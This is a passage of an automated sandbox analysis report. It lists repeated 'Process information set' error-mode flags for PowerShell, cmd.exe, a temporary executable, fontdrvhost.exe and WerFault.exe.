                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
